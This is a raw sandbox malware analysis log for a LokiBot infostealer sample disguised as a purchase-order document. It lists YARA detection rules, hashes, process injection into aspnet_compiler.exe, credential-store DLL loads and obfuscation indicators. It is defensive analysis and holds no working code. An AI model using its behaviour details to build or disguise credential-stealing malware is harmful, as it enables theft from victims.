            Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
            Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
            Source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
            Source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
            Source: Process Memory Space: (PO403810)_VOLEX_doc.exe PID: 6936, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: Process Memory Space: aspnet_compiler.exe PID: 720, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
            Source: (PO403810)_VOLEX_doc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: (PO403810)_VOLEX_doc.exe, c8df85dfcdf224331f2ad38ab0a8975b8.csCryptographic APIs: 'TransformBlock'
            Source: (PO403810)_VOLEX_doc.exe, c8df85dfcdf224331f2ad38ab0a8975b8.csCryptographic APIs: 'TransformFinalBlock'
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@1/1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,2_2_0040650A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,2_2_0040434D
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\(PO403810)_VOLEX_doc.exe.logJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\FDD42EE188E931437F4FBE2C
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeMutant created: NULL
            Source: (PO403810)_VOLEX_doc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: (PO403810)_VOLEX_doc.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: (PO403810)_VOLEX_doc.exeReversingLabs: Detection: 52%
            Source: unknownProcess created: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe "C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exe"
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: samlib.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior
            Source: (PO403810)_VOLEX_doc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: (PO403810)_VOLEX_doc.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: (PO403810)_VOLEX_doc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: BATMAN.pdbxD source: (PO403810)_VOLEX_doc.exe, 00000000.00000002.1337291123.0000000005470000.00000004.08000000.00040000.00000000.sdmp, (PO403810)_VOLEX_doc.exe, 00000000.00000002.1336193818.00000000030C1000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: Sept10F.pdb source: (PO403810)_VOLEX_doc.exe
            Source: Binary string: aspnet_compiler.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.2589991317.00000000006E2000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: BATMAN.pdb source: (PO403810)_VOLEX_doc.exe, 00000000.00000002.1337291123.0000000005470000.00000004.08000000.00040000.00000000.sdmp, (PO403810)_VOLEX_doc.exe, 00000000.00000002.1336193818.00000000030C1000.00000004.00000800.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            Source: (PO403810)_VOLEX_doc.exe, c8f367215e22efc16111da46b34ffee89.cs.Net Code: ca84be5c414cb996eb1eece344b205490 System.Reflection.Assembly.Load(byte[])
            Source: (PO403810)_VOLEX_doc.exe, ccb3b41f1733e8628e87795e17067947f.cs.Net Code: c0667d015f59bee769c60f903d2f45662 System.Reflection.Assembly.Load(byte[])
            Source: Yara matchFile source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.(PO403810)_VOLEX_doc.exe.40e5590.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2589893075.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1336296569.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1336193818.0000000003104000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: (PO403810)_VOLEX_doc.exe PID: 6936, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 720, type: MEMORYSTR
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00402AC0 push eax; ret 2_2_00402AD4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00402AC0 push eax; ret 2_2_00402AFC
            Source: (PO403810)_VOLEX_doc.exeStatic PE information: section name: .text entropy: 7.690880893460008
            Source: (PO403810)_VOLEX_doc.exe, c8df85dfcdf224331f2ad38ab0a8975b8.csHigh entropy of concatenated method names: 'c57b9096c1305dd61ec666a8094e1eab4', 'cd55948e8745c23a6f624e68fbafbf546', 'c19e9a1840dbe7741fcacc8cd33a8b341', 'c78d2a4ce124736dc95b239a6d945ace2', 'c8237b274f025dfd238d3474c2dbacac4', 'ITj7DUkapRtcvhedNtZ', 'o6OUkFkDocR090hopJZ', 'Egeop8kbYjBlk05QWtn', 'tSTmdkkUm9hr1Mnkvpt', 'cgoQ28kN8qfGKZkVGZ5'
            Source: (PO403810)_VOLEX_doc.exe, c2dc992a05b937d1a753712eb10379340.csHigh entropy of concatenated method names: 'phf8h3bu6YRXkX0etO', 'QggBUFaAuA6EtyjnKg', 'vbmomm90v9XgFBJyAW', 'XEwT4TDxcVSidmpYdO', 'YwIAhIUjK58yl2l3CK', 'VO6iarNWlpTVP24gfc'
            Source: (PO403810)_VOLEX_doc.exe, c54987bef8f04bc4587dffb13220fe70b.csHigh entropy of concatenated method names: 'cdfdfa51935211f8eea378372541a18e7', 'hKVGrWlB8aXX5s4Pqs', 'FI5M0UzTglInN0BalW', 't0sZhSVwATZri6uVZT', 'oYTX12P22vShYZnBq9', 'uRrbWlkqGZY8oW2HN2R', 'I2XOJKkkENnIItWkLlx', 'JCi6W0k85TSDvvf8aXu'
            Source: (PO403810)_VOLEX_doc.exe, Form1.csHigh entropy of concatenated method names: 'Dispose', 'c3b92562f33da9ba8f6ab9423af882b29', 'uImbH6BSLxB0dhXvQr', 'uuD9u7ErTWTxr8EB85', 'fgVmi6SdpbBB736bip', 'W3IcjfI1jakqk6GdGk', 'dxwAbQoGTOoWPVEFZr', 'hB59UoxAlfEFt5ZhBV', 'DM8aGI0kuT9CY1Vckw', 'YFZByWylVNbQnCrw4F'
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\(PO403810)_VOLEX_doc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
